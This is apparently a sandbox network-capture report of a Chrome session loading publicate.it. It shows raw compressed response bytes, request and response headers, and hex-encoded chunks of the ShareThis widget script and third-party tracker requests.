                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 1d 7a d7 75 a0 ef e4 c8 0b 92 f8 e3 1d 8f 46 ab 1f 1d 51 4d 0c 8d 1c b9 7a 7b b4 bb 7b 04 d5 67 50 92 26 4f ca 16 8e 74 8c 75 4b ba 27 46 47 87 86 c6 24 23 aa f1 11 55 28 a4 72 44 55 3e 72 8c db 3d 34 a4 ea ee ee ee 8e ee 51 75 ab ba bb 5b 46 ea 76 5a 28 74 92 b9 de 9b b6 72 e9 44 b1 df f0 a6 dd 7c ff 79 b5 9e 74 a1 cb 39 f2 b1 fd a3 63 dd 4f 7f 71 e3 d1 f1 cf c7 46 47 1f fe fc e9 91 d1 71 54 a0 21 46 55 af 34 4a c6 21 8d eb f8 39 04 78 c9 d8 cf 87 ba 25 dd 43 e4 d5 52 79 5d b1 ea 18 77 64 48 d5 ad 2a 53 0d f5 4c 48 ba 55 a3 43 43 ca 9d 61 16 07 9d c8 dc 75 99 af 5c 72 51 fe e1 1f 28 0b bd 8f d5 53 a0 47 c9 0b ba f2 1f 8e 86 8f de e8 78 3a 7a f5 67 37 46 47 9f 4e 3c fd d5 43 c2 ea 68 50 35 ed de 38 57 d2 9d 3c 3e 3a 3e 31 d6 fd f4 69 f7 f8 c4 78 f7 f8 88
                                                                                                                                                                                                        Data Ascii: zuFQMz{{gP&OtuK'FG$#U(rDU>r=4Qu[FvZ(trD|yt9cOqFGqT!FU4J!9x%CRy]wdH*SLHUCCau\rQ(SGx:zg7FGN<ChP58W<>:>1ix
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 0f 11 10 5d 70 1f 1f 8c e9 c8 d4 79 fe 38 86 33 e8 36 b6 f4 4d 94 49 d0 8d 56 90 a3 31 a7 b6 e9 38 86 ef fd 6e 92 f6 4e 09 ef e6 42 fd 0d 68 d1 a1 a4 48 be 22 ac e0 53 8c 09 f3 04 be 20 ab d5 18 53 dd 5c e9 1c 00 66 20 1c c3 1c 99 10 8c 7c 30 1c a8 6b 0e 5a 1c 66 b0 d8 7e b0 c6 64 d0 0d 65 ef 38 e6 fa f5 14 b9 62 e6 0c 1d 9c 82 44 c3 9a be fd e3 36 8c 89 7d 7a fb ea cf 91 e5 31 26 cc 31 41 83 c7 44 fc 37 13 e1 38 e6 e2 82 31 b1 a6 67 4c 67 8c 89 f2 50 cd 15 8e b6 86 a0 43 64 30 4e 31 c0 40 78 c7 b1 ad df 7d 0d 1f 3a fa ce 15 de 3c f3 87 ce c4 1e 7c fb ed d1 07 58 d3 1f cb af 76 40 8c 77 95 c9 04 9a 57 c6 12 b0 c0 f7 66 21 1c f3 71 84 49 30 cf fe 86 d1 7c c0 f3 9a f6 13 9f 16 ba 8b d1 f2 38 6d 22 87 46 5a 99 4c 67 6c ab 5e 68 ef 85 0f 0b 71 3a d3 e7 66 e7
                                                                                                                                                                                                        Data Ascii: ]py836MIV18nNBhH"S S\f |0kZf~de8bD6}z1&1AD781gLgPCd0N1@x}:<|Xv@wWf!qI0|8m"FZLgl^hq:f
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: b8 2e 74 08 ef 3e 96 0d 9d e9 e2 e8 84 ac 3e 5b 31 9d 5f a3 a0 d3 85 bd 34 d0 71 7d e8 37 89 5d 0e 2c 1c ba 63 88 93 e1 f5 90 b4 49 62 d2 98 34 9c f9 fe 4a b3 3a d9 ae c9 a1 13 84 99 0d 6a e8 0f 60 73 13 53 52 c7 4d 0f 1d e2 7b 88 93 f3 2c ef 93 e9 f2 93 57 c9 d3 6a bf 3c 4e f7 c1 e8 37 ff f3 7f fe 67 2f 40 ff fb 7f fc c7 37 4d a6 2d c1 e3 a6 86 4e 2c 5b 75 0a 09 31 b4 c3 e6 bb 93 f5 c6 8f 7f 82 ce 20 6a 46 cc 17 c1 e9 3e f8 cd ff 21 74 e8 ef ff 81 f4 4d 93 25 3b 1d 27 3b 6d 4e 21 93 e5 e7 b0 d5 61 dd 94 73 4d ac a4 50 5e 35 af e8 be 18 d0 e9 ff f3 07 c4 fc 0f 87 08 e6 ff f1 e7 1a b4 7b 95 25 42 c7 48 ab 23 ea 93 b1 3b 6c 75 d5 83 ae 3e 8d 0c 9c b9 c9 ac 4e db b4 08 6d 3a fd 3f ff f0 87 ff f9 9f 3f fc 81 84 fe e7 3f ff b9 c6 94 6d ee 6e 6f 00 00 20 00 49
                                                                                                                                                                                                        Data Ascii: .t>>[1_4q}7],cIb4J:j`sSRM{,Wj<N7g/@7M-N,[u1 jF>!tM%;';mN!asMP^5{%BH#;lu>Nm:???mno I
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: b5 a1 bf 4b b5 5b 3c e6 24 f8 79 60 9f 67 97 0d 87 9d 4f 2d 21 91 5b b9 f2 55 ca db f4 b7 e8 0c 27 93 a6 9e 18 5a de 42 5f 83 72 f7 45 a5 4e 66 8b 73 ea 24 cc bb cb 86 59 46 97 6d e5 ca 95 76 eb 5e a7 db d2 19 0c 74 2e 70 13 c9 05 31 7f 07 a5 ee 8b 6d 76 b2 ea 37 07 ea cb bd 38 b3 72 e5 ca 95 94 b5 74 ba 2d dd 86 c1 70 34 c6 59 95 0d 9d 68 99 c1 a0 d3 df a2 bf 4b 76 d2 c9 5e 9b a9 35 7f ea c6 2b c3 1a 61 1e 8c 51 c2 07 3e 19 fa ea d5 94 b5 6f d1 6d 6d 60 82 24 c3 d6 14 1f b6 36 36 36 36 f4 37 34 85 99 45 93 1e f5 d9 b7 eb 46 ac bd e3 98 cb c2 72 36 e3 ac 43 c1 a7 38 7d f5 6a ca ba f7 e9 74 ba 8d 49 f4 16 22 4e a7 ff e4 d5 45 67 ae e5 4e 54 81 96 c2 e9 cc ad 0b eb 9d a9 4f 73 68 7c e8 ab 29 94 15 ef bf 45 37 9d 5e 7f db 9e b2 7a e5 e2 c9 00 f5 39 94 f9 cd
                                                                                                                                                                                                        Data Ascii: K[<$y`gO-![U'ZB_rENfs$YFmv^t.p1mv78rt-p4YhKv^5+aQ>omm`$666674EFr6C8}jtI"NEgNTOsh|)E7^z9
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 6c f1 9b 55 5b 2c 55 bb e0 53 27 4a ed aa ba cf f8 80 6e 4b df ac 5e ad 67 dc 44 4e 93 bf 13 1e d6 b1 3c 38 1d 77 72 0d b9 28 cc 4e bc 72 2e 9c 1f 5e 22 f7 23 8e 0d 6d 16 a0 6b 73 f4 a9 6e d7 0d 37 ee c0 1a b5 eb 93 3b 6d 1a e8 64 22 47 04 78 c2 ea 2f 76 fa 6a 14 dd 99 87 f4 8c 6e 51 81 de 73 4b 95 e7 16 4f 4f ed 1f 76 41 80 d7 c6 77 23 87 77 a2 51 d7 89 ee 9a 8b 21 ee 21 3e 98 5b e4 a9 62 be 58 94 9d 1d 97 9d 1d 17 1a e6 11 16 16 16 b5 03 e6 32 ef d8 e1 06 97 35 de df b1 63 2b f2 fb 64 ab 13 99 1b 50 d6 73 ba 96 3b b4 e8 81 be 81 7a 5d 36 04 1d c5 76 16 8b fd 42 a7 bf 4a b1 a7 d3 6d 9c 1d f4 29 7b 7a 56 11 7f 50 fb bf ca 7c 03 c1 ae 86 5d f7 f7 56 1d da ab 7d 86 bb aa 0e b9 c0 3c 7b e3 b7 e9 a8 98 a2 89 ef ea 56 9a c4 1e e2 12 b8 1d 93 67 84 73 c5 c2 6c
                                                                                                                                                                                                        Data Ascii: lU[,US'JnK^gDN<8wr(Nr.^"#mksn7;md"Gx/vjnQsKOOvAw#wQ!!>[bX25c+dPs;z]6vBJm){zVP|]V}<{Vgsl


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        48192.168.2.549797104.16.141.2094436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC524OUTGET /20234315.js HTTP/1.1
                                                                                                                                                                                                        Host: js.hs-scripts.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC786INHTTP/1.1 410 Gone
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:19 GMT
                                                                                                                                                                                                        Content-Type: application/json;charset=utf-8
                                                                                                                                                                                                        Content-Length: 99
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        vary: origin
                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                        access-control-max-age: 3600
                                                                                                                                                                                                        access-control-allow-origin: https://publicate.it
                                                                                                                                                                                                        x-envoy-upstream-service-time: 20
                                                                                                                                                                                                        x-evy-trace-route-service-name: envoyset-translator
                                                                                                                                                                                                        x-evy-trace-virtual-host: all
                                                                                                                                                                                                        x-hubspot-correlation-id: 249e86ea-eade-4d29-9d58-5887032f0642
                                                                                                                                                                                                        x-evy-trace-served-by-pod: iad02/hubapi-td/envoy-proxy-58bbf9c46c-gljrz
                                                                                                                                                                                                        x-evy-trace-listener: listener_https
                                                                                                                                                                                                        x-evy-trace-route-configuration: listener_https/all
                                                                                                                                                                                                        x-request-id: 249e86ea-eade-4d29-9d58-5887032f0642
                                                                                                                                                                                                        CF-Cache-Status: EXPIRED
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615aa5e830f8f-EWR
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC99INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 52 65 73 6f 75 72 63 65 20 67 6f 6e 65 22 2c 22 63 6f 72 72 65 6c 61 74 69 6f 6e 49 64 22 3a 22 32 34 39 65 38 36 65 61 2d 65 61 64 65 2d 34 64 32 39 2d 39 64 35 38 2d 35 38 38 37 30 33 32 66 30 36 34 32 22 7d
                                                                                                                                                                                                        Data Ascii: {"status":"error","message":"Resource gone","correlationId":"249e86ea-eade-4d29-9d58-5887032f0642"}


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        49192.168.2.5497963.160.212.1274436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC537OUTGET /js/sharethis.js HTTP/1.1
                                                                                                                                                                                                        Host: platform-api.sharethis.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC599INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                        Content-Length: 210640
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Edge-control: cache-maxage=60m,downstream-ttl=60m
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:20 GMT
                                                                                                                                                                                                        Cache-Control: max-age=600, public
                                                                                                                                                                                                        ETag: W/"336d0-g/6wprihOkYe7HpMswOVDodT6lU"
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                        Via: 1.1 27dcd9aaf05c8fa7daa5723173f38eba.cloudfront.net (CloudFront)
                                                                                                                                                                                                        X-Amz-Cf-Pop: MXP53-P3
                                                                                                                                                                                                        X-Amz-Cf-Id: 2HyYDcRtLF1IWBcWUQyeyuyWYWYkkDEehTqj5n84-P0KvVicH7b2ag==
                                                                                                                                                                                                        Age: 194
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC15785INData Raw: 69 66 20 28 21 44 61 74 65 2e 6e 6f 77 29 20 7b 0a 20 20 44 61 74 65 2e 6e 6f 77 20 3d 20 66 75 6e 63 74 69 6f 6e 20 6e 6f 77 28 29 20 7b 0a 20 20 20 20 72 65 74 75 72 6e 20 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 3b 0a 20 20 7d 3b 0a 7d 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 66 75 6e 63 4e 61 6d 65 2c 20 62 61 73 65 4f 62 6a 29 20 7b 0a 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 20 20 2f 2f 20 54 68 65 20 70 75 62 6c 69 63 20 66 75 6e 63 74 69 6f 6e 20 6e 61 6d 65 20 64 65 66 61 75 6c 74 73 20 74 6f 20 77 69 6e 64 6f 77 2e 64 6f 63 52 65 61 64 79 0a 20 20 2f 2f 20 62 75 74 20 79 6f 75 20 63 61 6e 20 6d 6f 64 69 66 79 20 74 68 65 20 6c 61 73 74 20 6c 69 6e 65 20 6f 66 20 74 68 69 73 20 66 75 6e 63 74 69 6f 6e 20 74 6f 20 70 61 73
                                                                                                                                                                                                        Data Ascii: if (!Date.now) { Date.now = function now() { return new Date().getTime(); };}(function(funcName, baseObj) { "use strict"; // The public function name defaults to window.docReady // but you can modify the last line of this function to pas
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC16384INData Raw: 20 3d 20 5b 24 65 6c 2e 63 6c 61 73 73 4e 61 6d 65 2c 20 24 65 6c 2e 69 64 5d 3b 0a 20 20 20 20 66 6f 72 20 28 69 20 3d 20 30 2c 20 6c 65 6e 20 3d 20 72 65 66 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6c 65 6e 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 73 74 72 20 3d 20 72 65 66 5b 69 5d 3b 0a 20 20 20 20 20 20 69 66 20 28 74 79 70 65 6f 66 20 73 74 72 20 21 3d 3d 20 27 73 74 72 69 6e 67 27 29 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6e 74 69 6e 75 65 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 69 66 20 28 72 65 2e 74 65 73 74 28 28 73 74 72 20 7c 7c 20 27 27 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 72 75 65 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 72 65 74 75 72 6e 20
                                                                                                                                                                                                        Data Ascii: = [$el.className, $el.id]; for (i = 0, len = ref.length; i < len; i++) { str = ref[i]; if (typeof str !== 'string') { continue; } if (re.test((str || '').toLowerCase())) { return true; } } return
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC16384INData Raw: 22 20 2b 20 28 73 74 2e 71 73 28 70 61 72 61 6d 73 29 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 69 6d 67 20 3d 20 6e 65 77 20 49 6d 61 67 65 28 31 2c 20 31 29 3b 0a 20 20 20 20 69 6d 67 2e 73 72 63 20 3d 20 72 65 73 6f 75 72 63 65 3b 0a 20 20 20 20 69 6d 67 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 6e 65 78 74 20 3d 3d 3d 20 22 66 75 6e 63 74 69 6f 6e 22 20 3f 20 6e 65 78 74 28 74 72 75 65 29 20 3a 20 76 6f 69 64 20 30 3b 0a 20 20 20 20 7d 3b 0a 20 20 20 20 72 65 74 75 72 6e 20 69 6d 67 2e 6f 6e 65 72 72 6f 72 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 6e 65 78 74 20 3d 3d 3d 20 22 66 75 6e 63 74 69 6f 6e 22
                                                                                                                                                                                                        Data Ascii: " + (st.qs(params)); } img = new Image(1, 1); img.src = resource; img.onload = function() { return typeof next === "function" ? next(true) : void 0; }; return img.onerror = function() { return typeof next === "function"
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC16384INData Raw: 77 2e 5f 5f 73 68 61 72 65 74 68 69 73 5f 5f 0a 0a 20 20 73 74 2e 43 75 73 74 6f 6d 43 6f 6c 6f 72 20 3d 20 63 6c 61 73 73 20 43 75 73 74 6f 6d 43 6f 6c 6f 72 20 7b 0a 20 20 20 20 63 6f 6e 73 74 72 75 63 74 6f 72 28 72 2c 20 67 2c 20 62 29 20 7b 0a 20 20 20 20 20 20 74 68 69 73 2e 73 65 74 28 72 2c 20 67 2c 20 62 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 74 6f 53 74 72 69 6e 67 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 60 72 67 62 28 24 7b 4d 61 74 68 2e 72 6f 75 6e 64 28 74 68 69 73 2e 72 29 7d 2c 20 24 7b 4d 61 74 68 2e 72 6f 75 6e 64 28 74 68 69 73 2e 67 29 7d 2c 20 24 7b 4d 61 74 68 2e 72 6f 75 6e 64 28 74 68 69 73 2e 62 29 7d 29 60 3b 0a 20 20 20 20 7d 0a 20 20 0a 20 20 20 20 73 65 74 28 72 2c 20 67 2c 20 62 29 20 7b 0a 20 20
                                                                                                                                                                                                        Data Ascii: w.__sharethis__ st.CustomColor = class CustomColor { constructor(r, g, b) { this.set(r, g, b); } toString() { return `rgb(${Math.round(this.r)}, ${Math.round(this.g)}, ${Math.round(this.b)})`; } set(r, g, b) {
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC16384INData Raw: 76 69 64 65 6f 27 2c 0a 20 20 20 20 27 2e 74 77 69 74 74 65 72 2d 77 69 64 67 65 74 27 2c 0a 20 20 20 20 27 65 6d 62 65 64 27 2c 0a 20 20 20 20 27 69 66 72 61 6d 65 27 2c 0a 20 20 20 20 27 5b 63 6c 61 73 73 5e 3d 22 50 49 4e 22 5d 27 0a 20 20 5d 3b 0a 0a 20 20 76 61 72 20 63 6f 6e 66 69 67 20 3d 20 5b 0a 20 20 20 20 7b 20 74 79 70 65 3a 20 22 61 75 64 69 6f 22 2c 20 75 72 6c 3a 20 22 61 6e 63 68 6f 72 2e 66 6d 22 20 7d 2c 0a 20 20 20 20 7b 20 74 79 70 65 3a 20 22 61 75 64 69 6f 22 2c 20 75 72 6c 3a 20 22 6f 70 65 6e 2e 73 70 6f 74 69 66 79 2e 63 6f 6d 2f 65 6d 62 65 64 22 20 7d 2c 0a 20 20 20 20 7b 20 74 79 70 65 3a 20 22 61 75 64 69 6f 22 2c 20 75 72 6c 3a 20 22 70 6c 61 79 65 72 2e 6d 65 67 61 70 68 6f 6e 65 2e 66 6d 22 20 7d 2c 0a 20 20 20 20 7b 20 74
                                                                                                                                                                                                        Data Ascii: video', '.twitter-widget', 'embed', 'iframe', '[class^="PIN"]' ]; var config = [ { type: "audio", url: "anchor.fm" }, { type: "audio", url: "open.spotify.com/embed" }, { type: "audio", url: "player.megaphone.fm" }, { t
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC16384INData Raw: 49 43 4f 4e 53 5f 57 48 49 54 45 20 3d 20 7b 0a 20 20 20 20 61 69 72 62 6e 62 3a 20 69 6d 67 28 27 61 69 72 62 6e 62 2d 77 68 69 74 65 2e 73 76 67 27 29 2c 0a 20 20 20 20 61 6d 61 7a 6f 6e 3a 20 69 6d 67 28 27 61 6d 61 7a 6f 6e 2d 77 68 69 74 65 2e 73 76 67 27 29 2c 0a 20 20 20 20 62 61 6e 64 63 61 6d 70 3a 20 69 6d 67 28 27 62 61 6e 64 63 61 6d 70 2d 77 68 69 74 65 2e 73 76 67 27 29 2c 0a 20 20 20 20 62 65 68 61 6e 63 65 3a 20 69 6d 67 28 27 62 65 68 61 6e 63 65 2d 77 68 69 74 65 2e 73 76 67 27 29 2c 0a 20 20 20 20 62 6c 6f 67 67 65 72 3a 20 69 6d 67 28 27 62 6c 6f 67 67 65 72 2d 77 68 69 74 65 2e 73 76 67 27 29 2c 0a 20 20 20 20 62 6c 6d 3a 20 69 6d 67 28 27 62 6c 6d 2d 77 68 69 74 65 2e 73 76 67 27 29 2c 0a 20 20 20 20 62 69 74 62 75 63 6b 65 74 3a 20
                                                                                                                                                                                                        Data Ascii: ICONS_WHITE = { airbnb: img('airbnb-white.svg'), amazon: img('amazon-white.svg'), bandcamp: img('bandcamp-white.svg'), behance: img('behance-white.svg'), blogger: img('blogger-white.svg'), blm: img('blm-white.svg'), bitbucket:
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC16384INData Raw: 70 6f 69 6e 74 65 72 3b 5c 6e 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 36 70 78 3b 5c 6e 20 20 68 65 69 67 68 74 3a 20 35 36 70 78 3b 5c 6e 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 38 70 78 3b 5c 6e 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 5c 6e 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 5c 6e 20 20 72 69 67 68 74 3a 20 31 34 70 78 3b 5c 6e 20 20 77 69 64 74 68 3a 20 35 36 70 78 3b 5c 6e 20 20 7a 2d 69 6e 64 65 78 3a 20 34 30 3b 5c 6e 7d 22 3b 0a 20 20 20 20 73 74 2e 63 73 73 28 6d 6f 62 69 6c 65 5f 63 73 73 29 3b 0a 20 20 20 20 68 74 6d 6c 20 3d 20 22 3c 64 69 76 20 63 6c 61 73 73 3d 27 73 74 2d 62 61 63 6b 64 72 6f 70 27 3e 3c 2f 64 69 76 3e 22 3b 0a 20 20 20 20 68 74 6d 6c 20 2b 3d 20 22 3c 64 69 76 20 63 6c 61 73 73 3d 27 73
                                                                                                                                                                                                        Data Ascii: pointer;\n font-size: 36px;\n height: 56px;\n line-height: 28px;\n padding: 10px;\n position: fixed;\n right: 14px;\n width: 56px;\n z-index: 40;\n}"; st.css(mobile_css); html = "<div class='st-backdrop'></div>"; html += "<div class='s
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 73 74 5f 73 61 6d 65 73 69 74 65 3d 31 3b 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 3b 53 65 63 75 72 65 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 5f 5f 73 74 64 6f 73 5f 5f 2e 64 61 74 61 2e 70 61 72 73 65 43 6f 6f 6b 69 65 28 22 73 74 5f 73 61 6d 65 73 69 74 65 22 2c 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 61 6d 65 73 69 74 65 5f 73 65 63 75 72 65 20 3d 20 22 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 3b 53 65 63 75 72 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 73 74 5f 73 61 6d 65 73 69 74 65 3d 31 3b 6d 61 78 2d 61 67 65 3d
                                                                                                                                                                                                        Data Ascii: document.cookie = "st_samesite=1;SameSite=None;Secure"; if (__stdos__.data.parseCookie("st_samesite", document.cookie)) { samesite_secure = "SameSite=None;Secure" document.cookie = "st_samesite=1;max-age=
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC16384INData Raw: 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 73 74 6c 69 62 20 21 3d 3d 20 6e 75 6c 6c 20 26 26 20 73 74 6c 69 62 2e 6f 6e 73 63 72 69 70 74 6c 6f 61 64 3b 0a 0a 20 20 69 66 20 28 21 73 74 5f 70 76 69 65 77 5f 6c 6f 67 67 65 64 20 26 26 20 21 5f 5f 73 74 64 6f 73 5f 5f 2e 6f 6e 73 63 72 69 70 74 6c 6f 61 64 20 26 26 20 64 6f 63 75 6d 65 6e 74 2e 55 52 4c 2e 69 6e 64 65 78 4f 66 28 22 65 64 67 65 2e 73 68 61 72 65 74 68 69 73 2e 63 6f 6d 22 29 20 3d 3d 20 2d 31 29 20 7b 0a 20 20 20 20 20 20 5f 5f 73 74 64 6f 73 5f 5f 2e 64 61 74 61 2e 69 6e 69 74 28 29 3b 0a 20 20 20 20 20 20 5f 5f 73 74 64 6f 73 5f 5f 2e 64 61 74 61 2e 73 65 74 28 22 63 6d 73 22 2c 20 5f 73 74 2e 63 6d 73 2c 20 22 70 61 67 65 49 6e 66 6f 22 29 3b 0a 20 20 20 20 20 20 5f 5f 73 74
                                                                                                                                                                                                        Data Ascii: == 'undefined' && stlib !== null && stlib.onscriptload; if (!st_pview_logged && !__stdos__.onscriptload && document.URL.indexOf("edge.sharethis.com") == -1) { __stdos__.data.init(); __stdos__.data.set("cms", _st.cms, "pageInfo"); __st
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC16384INData Raw: 65 73 74 72 69 63 74 69 6f 6e 73 3a 20 70 75 62 6c 69 73 68 65 72 5f 72 65 73 74 72 69 63 74 69 6f 6e 73 2c 0a 20 20 20 20 20 20 70 75 72 70 6f 73 65 73 3a 20 70 75 62 6c 69 73 68 65 72 5f 70 75 72 70 6f 73 65 73 2c 0a 20 20 20 20 20 20 74 65 78 74 5f 63 6f 6c 6f 72 3a 20 74 65 78 74 5f 63 6f 6c 6f 72 2c 0a 20 20 20 20 20 20 70 72 65 76 69 65 77 3a 20 70 72 65 76 69 65 77 0a 20 20 20 20 7d 3b 0a 20 20 20 20 69 66 20 28 64 69 73 70 6c 61 79 20 3d 3d 3d 20 22 61 6c 77 61 79 73 22 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 73 74 2e 6a 73 28 22 68 74 74 70 73 3a 2f 2f 67 64 70 72 2d 61 70 69 2e 73 68 61 72 65 74 68 69 73 2e 63 6f 6d 2f 63 6d 70 2d 76 32 2e 6a 73 22 29 3b 0a 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 64 69 73 70 6c 61 79 20 3d 3d 3d
                                                                                                                                                                                                        Data Ascii: estrictions: publisher_restrictions, purposes: publisher_purposes, text_color: text_color, preview: preview }; if (display === "always") { return st.js("https://gdpr-api.sharethis.com/cmp-v2.js"); } else if (display ===


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        50192.168.2.54979918.239.83.54436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC542OUTGET /lftracker_v1_bElvO73dOjE4ZMqj.js HTTP/1.1
                                                                                                                                                                                                        Host: sc.lfeeder.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:20 UTC667INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                        Content-Length: 31385
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Last-Modified: Thu, 25 Jul 2024 07:28:40 GMT
                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
